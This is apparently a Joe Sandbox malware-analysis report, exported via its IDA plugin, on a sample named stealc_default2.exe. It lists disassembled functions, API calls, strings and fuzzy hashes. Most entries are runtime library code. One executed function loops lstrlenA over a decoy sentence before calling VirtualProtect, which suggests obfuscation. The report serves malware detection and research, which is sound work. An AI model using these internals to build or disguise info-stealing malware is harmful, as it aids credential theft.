Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 5db7edf03dd5c6a86733f78c3fc37fecd77a691f09511d684ccae05772ab5e40
Instruction ID: 91ec29eb5be505712193f20e889ba6035279a869843729da5c2c1c8d1a6e38dc
Opcode Fuzzy Hash: 5db7edf03dd5c6a86733f78c3fc37fecd77a691f09511d684ccae05772ab5e40
Instruction Fuzzy Hash: 5E018431A50625EBDB218F50DC09BAEB7F9FB44B11F400526F912A22A0DB789900CA58

Function 00401F00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00401F9D

Part of subcall function 00408090: RaiseException.KERNEL32(E06D7363,00000001,00000003,00407FAB,?,?,?,?,00407FAB,0000000C,00432FA4,0000000C), ref: 004080F0

Strings

ios_base::badbit set, xrefs: 00401F37, 00401F62, 00401F80
ios_base::eofbit set, xrefs: 00401F46
ios_base::failbit set, xrefs: 00401E62, 00401F41

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3109751735-1866435925
Opcode ID: 4ead06d7015465d74104fe04bb50a28eb9893de3519d089dfdf398cb4e8224d9
Instruction ID: 39c8128b798e2086e3302e8ab46e2dce8cada1f1b911e2d41b88b79c7a5bec65
Opcode Fuzzy Hash: 4ead06d7015465d74104fe04bb50a28eb9893de3519d089dfdf398cb4e8224d9
Instruction Fuzzy Hash: BD1136B29107156BC710DF68D801B86B3E8AF08310F14853FFA54E7291F778E804CBA9

Function 00407420 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00407DA8
___raise_securityfailure.LIBCMT ref: 00407E90

Strings

#7@, xrefs: 00407E13
@SC, xrefs: 00407E8B

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: #7@$@SC
API String ID: 3761405300-54278199
Opcode ID: be0408e9841c2604ed6c70be4b6810e12912a1b256ed321422f905974070e74f
Instruction ID: 0d92a2c854cdd6e88b4d1eeb56e5bf4da0bfe8ec24aca00867b110679a0b03e4
Opcode Fuzzy Hash: be0408e9841c2604ed6c70be4b6810e12912a1b256ed321422f905974070e74f
Instruction Fuzzy Hash: DA2107B4640A00DBD318CF15F9857943BF4BB68355FA0643AE9088B3B1D3B46485CF1E

Function 0040B772 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,0040B723,00000000,00000001,0043568C,?,?,?,0040B8C6,00000004,InitializeCriticalSectionEx,00427C38,InitializeCriticalSectionEx), ref: 0040B77F
GetLastError.KERNEL32(?,0040B723,00000000,00000001,0043568C,?,?,?,0040B8C6,00000004,InitializeCriticalSectionEx,00427C38,InitializeCriticalSectionEx,00000000,?,0040B67D), ref: 0040B789
LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,0040A593), ref: 0040B7B1

Strings

api-ms-, xrefs: 0040B796

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 22226141dfb546a2f16a4bc61347b62053759e468ff986d8c484c8ccf3c75455
Instruction ID: 4a96934300341e5ece3864587fe3feae18b3ac400cb1fe2ce3454729e361f76d
Opcode Fuzzy Hash: 22226141dfb546a2f16a4bc61347b62053759e468ff986d8c484c8ccf3c75455
Instruction Fuzzy Hash: 29E01A30384208BBEF205B61EC06F5A3E64EB40B85F904031FB0DE91E1E775A9519ACC

Function 004164C2 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(A1DECC5C,00000000,00000000,0040BDB8), ref: 00416525

Part of subcall function 0041B08B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00419056,?,00000000,-00000008), ref: 0041B137

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00416780
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004167C8
GetLastError.KERNEL32 ref: 0041686B

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 82cd919ffc66cdbec26423ec8f462efebf3297e9721ada9a3fb481d80f0d1854
Instruction ID: 1bb8143dd65314e62236f50c93da9e0a6d801424c5e2e01ca8c3ea5794d6433d
Opcode Fuzzy Hash: 82cd919ffc66cdbec26423ec8f462efebf3297e9721ada9a3fb481d80f0d1854
Instruction Fuzzy Hash: 7DD158B5E002589FCB11DFA9D880AEDBBB5FF48304F19412AE856E7351D734E882CB58

Function 0040A741 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0040A808
___AdjustPointer.LIBCMT ref: 0040A82B
___AdjustPointer.LIBCMT ref: 0040A8C7

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 651f461737145a99faeddf7e9cbc434de1019a0abfbd738a44b85bf0bb0bacfa
Instruction ID: 639cff4bd66d4eed68713a8ae307c2d2d1180f9e9004782a502f2a6fa8fea26a
Opcode Fuzzy Hash: 651f461737145a99faeddf7e9cbc434de1019a0abfbd738a44b85bf0bb0bacfa
Instruction Fuzzy Hash: 3D51CF72A00302AFEB29AF52C941B7A73A4EF40304F14853FE805672D1D739EC62C79A

Function 0041B4A7 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 0041B08B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00419056,?,00000000,-00000008), ref: 0041B137

GetLastError.KERNEL32 ref: 0041B50B
__dosmaperr.LIBCMT ref: 0041B512
GetLastError.KERNEL32(?,?,?,?), ref: 0041B54C
__dosmaperr.LIBCMT ref: 0041B553

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 98539fc020fd00bd43affe0888965e6ed426553bce3dc314c44ab490fe6ade4c
Instruction ID: cec987ca27f54d0df3a57789ab5f391b1316bc0051da666ab1eca3c5aeea150a
Opcode Fuzzy Hash: 98539fc020fd00bd43affe0888965e6ed426553bce3dc314c44ab490fe6ade4c
Instruction Fuzzy Hash: 3221B671600215BFDB20EF66C8418ABB7ADFF043A8710852FF85997251D779ED9087D4

Function 004108A2 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66e116e2024aada6cab71803717b56169a7abbe351efb3759331a0be8796517d
Instruction ID: f8db4804455f599fb5fabd8b5f86bcd1d132503182311fbe19c9dedc91394c0d
Opcode Fuzzy Hash: 66e116e2024aada6cab71803717b56169a7abbe351efb3759331a0be8796517d
Instruction Fuzzy Hash: 8F21F9B1610205AFEB20AF62CC90DAB776CFF40368710452BF415D7252D7B9EDD097A8

Function 0041C43D Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0041C445

Part of subcall function 0041B08B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00419056,?,00000000,-00000008), ref: 0041B137

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041C47D
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041C49D

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 4d096bac32b07df6f96bbfc29f435c2dddc1c3056e5e13fb52e26ce166ed4541
Instruction ID: cd346ceb72f841712861b774b6322b7d2f9c84398f992d5f92ec2fcb375f728e
Opcode Fuzzy Hash: 4d096bac32b07df6f96bbfc29f435c2dddc1c3056e5e13fb52e26ce166ed4541
Instruction Fuzzy Hash: 091104B2A48515BF672127B25CDACFF6D5CDE99398310402AF802D2102EE2CDD8285BD

Function 004241E7 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421C44,00000000,00000001,00000000,0040BDB8,?,004168BF,0040BDB8,00000000,00000000), ref: 004241FE
GetLastError.KERNEL32(?,00421C44,00000000,00000001,00000000,0040BDB8,?,004168BF,0040BDB8,00000000,00000000,0040BDB8,0040BDB8,?,00416E7D,?), ref: 0042420A

Part of subcall function 004241D0: CloseHandle.KERNEL32(FFFFFFFE,0042421A,?,00421C44,00000000,00000001,00000000,0040BDB8,?,004168BF,0040BDB8,00000000,00000000,0040BDB8,0040BDB8), ref: 004241E0

___initconout.LIBCMT ref: 0042421A

Part of subcall function 00424192: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004241C1,00421C31,0040BDB8,?,004168BF,0040BDB8,00000000,00000000,0040BDB8), ref: 004241A5

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,00421C44,00000000,00000001,00000000,0040BDB8,?,004168BF,0040BDB8,00000000,00000000,0040BDB8), ref: 0042422F

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: ca09305258c16a54d0dcba451752d25af7c96ee1953d8ec0ee725fe34d53713b
Instruction ID: 4f4531f6176a0c5b6c9a7a905856594723a902087f3f8d784f297790ae8fc46e
Opcode Fuzzy Hash: ca09305258c16a54d0dcba451752d25af7c96ee1953d8ec0ee725fe34d53713b
Instruction Fuzzy Hash: C1F03736200124BBCF222FD5FC0899A7F26FB853B0F414065FA5995130C6319870AB99

Function 004102AD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0041033D

Strings

pow, xrefs: 00410315, 00410332

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: c0cf26b477ce003e2ec9021a6fbfbc89d90c79d8eb5fc1b2203591be7fd8a1bc
Instruction ID: ba283ab10e86f0ff01337ebee0106e11519cd21400a500e12903ed81b54b832b
Opcode Fuzzy Hash: c0cf26b477ce003e2ec9021a6fbfbc89d90c79d8eb5fc1b2203591be7fd8a1bc
Instruction Fuzzy Hash: CD517EB1A4A6068BCB117714DA413EB37A09B40701F604D6BE8D5413E9EB7D8CF69A4F

Function 00401E50 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00401F9D

Part of subcall function 00408090: RaiseException.KERNEL32(E06D7363,00000001,00000003,00407FAB,?,?,?,?,00407FAB,0000000C,00432FA4,0000000C), ref: 004080F0

Strings

ios_base::badbit set, xrefs: 00401F37, 00401F62, 00401F80
ios_base::failbit set, xrefs: 00401E62

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 3109751735-1240500531
Opcode ID: 195284d85085cfcb6c91532f94d9606232df54a46d20a557ea02a48c59055347
Instruction ID: 797d091bbb829d4e8b0eea89e00af225cce609620468ab5527f299f1bcc47ce9
Opcode Fuzzy Hash: 195284d85085cfcb6c91532f94d9606232df54a46d20a557ea02a48c59055347
Instruction Fuzzy Hash: 2D414771504301AFC304DF29C841A9BB7E8EF89310F14862FF994A76A1E778E945CB99

Function 0040A430 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0040A46F
__IsNonwritableInCurrentImage.LIBCMT ref: 0040A523

Strings

csm, xrefs: 0040A50D

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: ca5a29bd391d885cd4634227e419514380eff920c463d90092caad24f93c2f58
Instruction ID: 2e999a1580a82348229a279466bd0bfc2513c0ac70a5a2249b741fcd72562a23
Opcode Fuzzy Hash: ca5a29bd391d885cd4634227e419514380eff920c463d90092caad24f93c2f58
Instruction Fuzzy Hash: 2741C834A00318ABCF10DF69C844A9E7BB0FF45314F1481A6E8146B3D2D779E961CB9A

Function 0040AD3D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 0040AD62

Strings

RCC, xrefs: 0040AD7C
MOC, xrefs: 0040AD74

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 5b710ab2a9f474c2cc4afd51bace25907f511bb75432380764933eab186ad071
Instruction ID: a4c454b0bcb5eef0a2e58a0d06434270c6490fd8828ce8058ef1224e804d7477
Opcode Fuzzy Hash: 5b710ab2a9f474c2cc4afd51bace25907f511bb75432380764933eab186ad071
Instruction Fuzzy Hash: 4C416E71900209AFCF15DFA4CD81AEEBBB5FF48304F19846AF904B7291D3399960DB95

Function 00407EA3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00407EAE
___raise_securityfailure.LIBCMT ref: 00407F6B

Strings

@SC, xrefs: 00407F66

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: @SC
API String ID: 3761405300-4053289583
Opcode ID: ee42222a1a21f84a104741ef492a216a118de1db3b1281724e16a62be68f0859
Instruction ID: 10e33e2e5eb9a3d5286ccbecc20551b6eaee076d59bf9c7ce06d7c1cd455d27c
Opcode Fuzzy Hash: ee42222a1a21f84a104741ef492a216a118de1db3b1281724e16a62be68f0859
Instruction Fuzzy Hash: 2D11E3B4651A04DBD318CF15F8817883BA4BB28346B50B03AE8088B371E3B09595CF5E

Function 00401870 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00401875
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 004018BA

Part of subcall function 004058AA: _Yarn.LIBCPMT ref: 004058C9
Part of subcall function 004058AA: _Yarn.LIBCPMT ref: 004058ED

Strings

bad locale name, xrefs: 004018C8

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 72551ae77e736be2171b1fcc8d603e91bdd62b17c33b334120392a8c0c99013b
Instruction ID: 698a41e2f8890499ec269fe88a942146f7bab7e11b1414401b60b7a9d3f26e65
Opcode Fuzzy Hash: 72551ae77e736be2171b1fcc8d603e91bdd62b17c33b334120392a8c0c99013b
Instruction Fuzzy Hash: 90F01D71515B408ED370DF3A8404743BEE0AF29714F048E2EE4CAD7A92E379E508CBA9

Analysis Process: stealc_default2.exePID: 5864, Parent PID: 3924COMMON

Execution Graph

Execution Coverage:	5.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.4%
Total number of Nodes:	2000
Total number of Limit Nodes:	41

Executed Functions

Function 00CA45C0 Relevance: 112.1, APIs: 34, Strings: 30, Instructions: 114
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00CB69FB), ref: 00CA45CC
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00CB69FB), ref: 00CA45D7
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00CB69FB), ref: 00CA45E2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00CB69FB), ref: 00CA45ED
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00CB69FB), ref: 00CA45F8
GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,00CB69FB), ref: 00CA4607
RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,00CB69FB), ref: 00CA460E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00CB69FB), ref: 00CA461C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00CB69FB), ref: 00CA4627
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00CB69FB), ref: 00CA4632
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00CB69FB), ref: 00CA463D
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00CB69FB), ref: 00CA4648
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00CB69FB), ref: 00CA465C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00CB69FB), ref: 00CA4667
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00CB69FB), ref: 00CA4672
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00CB69FB), ref: 00CA467D
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00CB69FB), ref: 00CA4688
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00CA46B1
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00CA46BC
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00CA46C7
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00CA46D2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00CA46DD
strlen.MSVCRT ref: 00CA46F0
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00CA4718
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00CA4723
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00CA472E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00CA4739
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00CA4744
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00CA4754
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00CA475F
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00CA476A
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00CA4775
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00CA4780
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00CA479C

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA4622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA475A
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA473F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA471E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA4729
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA4638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA4662
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA45C7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA4770
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA46C2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA45F3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA4617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA46B7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA474F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA46D8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA4643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA477B
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA4678
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA4765
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA45D2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA45E8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA4683
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA4657
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA46CD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA466D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA4713
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA45DD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA4734
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CA46AC

Memory Dump Source

